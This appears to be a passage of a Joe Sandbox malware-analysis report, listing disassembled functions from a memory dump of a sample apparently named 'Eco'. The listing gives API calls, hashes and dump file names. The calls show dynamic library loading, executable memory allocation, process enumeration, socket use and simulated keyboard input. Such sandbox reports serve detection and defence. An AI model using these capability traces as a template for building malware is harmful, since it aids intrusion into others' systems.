                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-3689287502
                          • Opcode ID: aa1f26c60d458858997a026e63e92f50c000d181c945dd28843570329d2729b8
                          • Instruction ID: 7627f740d31f5f10a6b973feee63ef2bb56b5b0e2aed04896214a1af9af9b71a
                          • Opcode Fuzzy Hash: aa1f26c60d458858997a026e63e92f50c000d181c945dd28843570329d2729b8
                          • Instruction Fuzzy Hash: AFD012745207338FDB205F71EC58B467AD4BF16791F11D82DD485D21D0D670D480CE10
                          Function 00524BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00524AF7,?), ref: 00524BB8
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00524BCA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          • Opcode ID: 5d88e20b00d714683c3f83f24d1b7ff3a7edd3756d2671d97369b6a676cc0ec3
                          • Instruction ID: ed38c9927dcb996749a807438ce4cf7787454dc41cbad23d465198699be7d92f
                          • Opcode Fuzzy Hash: 5d88e20b00d714683c3f83f24d1b7ff3a7edd3756d2671d97369b6a676cc0ec3
                          • Instruction Fuzzy Hash: DFD01770520722CFDB209F71EC08B4B7AE5BF16391B11AC6ED486D25E5EAB4D990DA10
                          Function 0059120F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0059145E), ref: 0059121D
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059122F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: 6b3bc4f0b21f961717d2692f92986d12bcacbb67a0a313153336f3b8c27380b4
                          • Instruction ID: fbe6495a7bc6ec6cc49284599ec9bf1065635f085db9acac2b0447d6ae54f475
                          • Opcode Fuzzy Hash: 6b3bc4f0b21f961717d2692f92986d12bcacbb67a0a313153336f3b8c27380b4
                          • Instruction Fuzzy Hash: B5D012745607238FDF205F75DC486467EE4FF25796B11C92DD485D6190D670C480C611
                          Function 005255F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00525E3D), ref: 005255FE
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00525610
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                          • Instruction ID: 25fea86732aebbb037d37f2c2669c7f75afe3b26a30e0252b8bf8663f525737b
                          • Opcode Fuzzy Hash: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                          • Instruction Fuzzy Hash: 3ED01774930B228FEB209F31EC0865B7AE4BF16395B11E82AD486D22E1E670D880CA50
                          Function 00589592 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005891A6,?,005A0980), ref: 005895A0
                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005895B2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetModuleHandleExW$kernel32.dll
                          • API String ID: 2574300362-199464113
                          • Opcode ID: 8f89064a6b324aed1f15656e06ec1f8a940cf910502c9f8b66ec6f69232f253b
                          • Instruction ID: e6bec4fe4a0ab2f8e6199d067429312fdc66014f42bd8f1eecc863f4be14a157
                          • Opcode Fuzzy Hash: 8f89064a6b324aed1f15656e06ec1f8a940cf910502c9f8b66ec6f69232f253b
                          • Instruction Fuzzy Hash: 50D012705207128FEB215F71DC1CA567AD4BF16391B159C2DD885D2190D7B0C480C710
                          Function 00567B7E Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                          • Instruction ID: afd084b53d0e2f865f878e215c9644af87f32cebd860babe3a24e5ef7fa2d248
                          • Opcode Fuzzy Hash: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                          • Instruction Fuzzy Hash: 06C19275A0421AEFDB14CFA4C884DAEBBB9FF4C718B104998E815DB251D731ED81DB90
                          Function 0058E4DB Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 0058E56F
                          • CharLowerBuffW.USER32(?,?), ref: 0058E5B2
                            • Part of subcall function 0058DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DC76
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E7B2
                          • _memmove.LIBCMT ref: 0058E7C5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          • Opcode ID: 2577f55490b6367f3b8b54e315cdb4c8c2657133c58aa43f2f0fb5122d38f02e
                          • Instruction ID: 9356ee359c299626ce91f79c111de5cb551e599c96edd96d5ba29373bbcfa4bb
                          • Opcode Fuzzy Hash: 2577f55490b6367f3b8b54e315cdb4c8c2657133c58aa43f2f0fb5122d38f02e
                          • Instruction Fuzzy Hash: 12C147716083119FC704EF24C49596ABBF4FF89314F14896DF899AB391D730E946CB81
                          Function 00588545 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00588575
                          • CoUninitialize.OLE32 ref: 00588580
                            • Part of subcall function 0059DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,005887D6,?,00000000), ref: 0059DCCE
                          • VariantInit.OLEAUT32(?), ref: 0058858B
                          • VariantClear.OLEAUT32(?), ref: 0058885C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          • Opcode ID: c9e12f76c44f8d0d0454c709d2cf63f96f04c9269a234f4653107edebc37f675
                          • Instruction ID: 27e29a4124fa8dad29c92d67db87adc1e48df04808b93a0c508f118795bc8da8
                          • Opcode Fuzzy Hash: c9e12f76c44f8d0d0454c709d2cf63f96f04c9269a234f4653107edebc37f675
                          • Instruction Fuzzy Hash: 71A13775604B029FDB10EF14C485A6ABBE4FF88354F548948F999AB3A1DB30ED44CF92
                          Function 0056727E Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyInitString
                          • String ID:
                          • API String ID: 2808897238-0
                          • Opcode ID: c136629f744ff6d54edbdd2b86fa4f73ec485741da5e497af6bfd26b8f6ae8e5
                          • Instruction ID: 6bdaa42c394cbd6ff79a2904148a61b793db75fbde09b5392e94afa923c91154
                          • Opcode Fuzzy Hash: c136629f744ff6d54edbdd2b86fa4f73ec485741da5e497af6bfd26b8f6ae8e5
                          • Instruction Fuzzy Hash: 4351E53460870B9ADF20AF65D899A2DBFA9FF9C315F209C1FE546CB291DF7098809711
                          Function 0058F2BE Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0058F2EE
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0058F2FC
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • Process32NextW.KERNEL32(00000000,?), ref: 0058F3BC
                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058F3CB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                          • String ID:
                          • API String ID: 2576544623-0
                          • Opcode ID: e213274815ebbb648f9051482367b1bfe8b347eedee0b87204b802784eb7b038
                          • Instruction ID: 842299a0ccf607ab249597633163086982877dd35a6556571acfceff0af40f42
                          • Opcode Fuzzy Hash: e213274815ebbb648f9051482367b1bfe8b347eedee0b87204b802784eb7b038
                          • Instruction Fuzzy Hash: 81516EB15047129FD710EF24DC89EABBBE8FFD9700F00492DF595922A1EB709948CB92
                          Function 00599BE1 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00599C50
                          • ScreenToClient.USER32(00000002,00000002), ref: 00599C83
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599CF0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: c1828171885a65954b7f732fe3614d3e9de84dd7473e29c96d63ba5ed0302429
                          • Instruction ID: bd74c6fa2c9e075cab38f057a91b73e4458d2b41861d9155398aa91c7892cba2
                          • Opcode Fuzzy Hash: c1828171885a65954b7f732fe3614d3e9de84dd7473e29c96d63ba5ed0302429
                          • Instruction Fuzzy Hash: 5C514D74A00209AFDF24DF68C984AAE7FF6FB55320F10815EF8159B2A0D730AD91DB90
                          Function 0053485A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                          • String ID:
                          • API String ID: 2782032738-0
                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                          • Instruction ID: d2d499df8a999ea6430a218bfe89c1b6fa874a0d0f8ba36e84977b021d9e826e
                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                          • Instruction Fuzzy Hash: C741B572A047469BDB188EA9C891A6FBFA5BF85360F24853DE855C7640DA70FD418F40
                          Function 0056A41B Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0056A46D
                          • __itow.LIBCMT ref: 0056A49E
                            • Part of subcall function 0056A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0056A759
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0056A507
                          • __itow.LIBCMT ref: 0056A55E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: 97ec6fb01b94eb94b3c007373c8625ad7261d4165c26fd8c666b2a8d13e9986d
                          • Instruction ID: 7cbc44d19fe3f6ea65bb0ed3d22e3e66ceb2b2dab03cbc65480013728346f107
                          • Opcode Fuzzy Hash: 97ec6fb01b94eb94b3c007373c8625ad7261d4165c26fd8c666b2a8d13e9986d
                          • Instruction Fuzzy Hash: CA418E70A00219ABDF11EF64D849BBE7FB9FF95750F040029F906A3281DB709E44CBA2
                          Function 00586E5A Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00586E81
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586E91
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00586EF5
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586F01
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLast$__itow__swprintfsocket
                          • String ID:
                          • API String ID: 2214342067-0
                          • Opcode ID: bcfd8120bd34fa25626096cf0ab2811a357eb5aedfc7bf7f2d1e346e12dd7ba9
                          • Instruction ID: a3dcfe7e5b4ab18535d3d074f2500b4c4820515aa7a5f820ed7883d686fe6259
                          • Opcode Fuzzy Hash: bcfd8120bd34fa25626096cf0ab2811a357eb5aedfc7bf7f2d1e346e12dd7ba9
                          • Instruction Fuzzy Hash: 6D41B475740201AFEB20BF24EC8AF6A7BE4FB84B14F048418FA15AB3C2D6749C418F91
                          Function 005868CA Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005A0980), ref: 00586957
                          • _strlen.LIBCMT ref: 00586989
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: 34df360bfedea0c158d80adcc6931550f3e490cf951f620afa2178b57cc548ab
                          • Instruction ID: f8e2919d7ebb196296faef6ce2081090f45c381775930f286ca2c1308629c34f
                          • Opcode Fuzzy Hash: 34df360bfedea0c158d80adcc6931550f3e490cf951f620afa2178b57cc548ab
                          • Instruction Fuzzy Hash: 51419531600116EBDB14FBA4DC99EBEBFA9BF94310F148155F816A72D2DB30AD44CB91
                          Function 00598C3E Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00598CCB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: c84155baf4af6cd26b22b8f755f0046b9677a6b48d017ee087142bf122ef75b6
                          • Instruction ID: 1ed3261b05692280d38f225ca3447acc33a9b5657070887577dcfb25d19cab17
                          • Opcode Fuzzy Hash: c84155baf4af6cd26b22b8f755f0046b9677a6b48d017ee087142bf122ef75b6
                          • Instruction Fuzzy Hash: 1D319234601209AFEF249E18CC85BB93FA5FB57310F644512FA51EB2E1CF31AD54ABA1
                          Function 0059AF24 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0059AF4D
                          • GetWindowRect.USER32(?,?), ref: 0059AFC3
                          • PtInRect.USER32(?,?,0059C437), ref: 0059AFD3
                          • MessageBeep.USER32(00000000), ref: 0059B044
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 5ced89755a71c396471c5a5769335906af09da9b66535c6bfef3d577599542bd
                          • Instruction ID: ac27ae79ded88a8144b6dc9eb3885b016e4b96fc9fa506c8da6c48346e30f162
                          • Opcode Fuzzy Hash: 5ced89755a71c396471c5a5769335906af09da9b66535c6bfef3d577599542bd
                          • Instruction Fuzzy Hash: B541AD30600205DFEF21CF58D988AAA7FF6FB59300F1481AAE524CB251D731E845EB91
                          Function 00571141 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00571192
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 005711AE
                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00571214
                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00571266
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
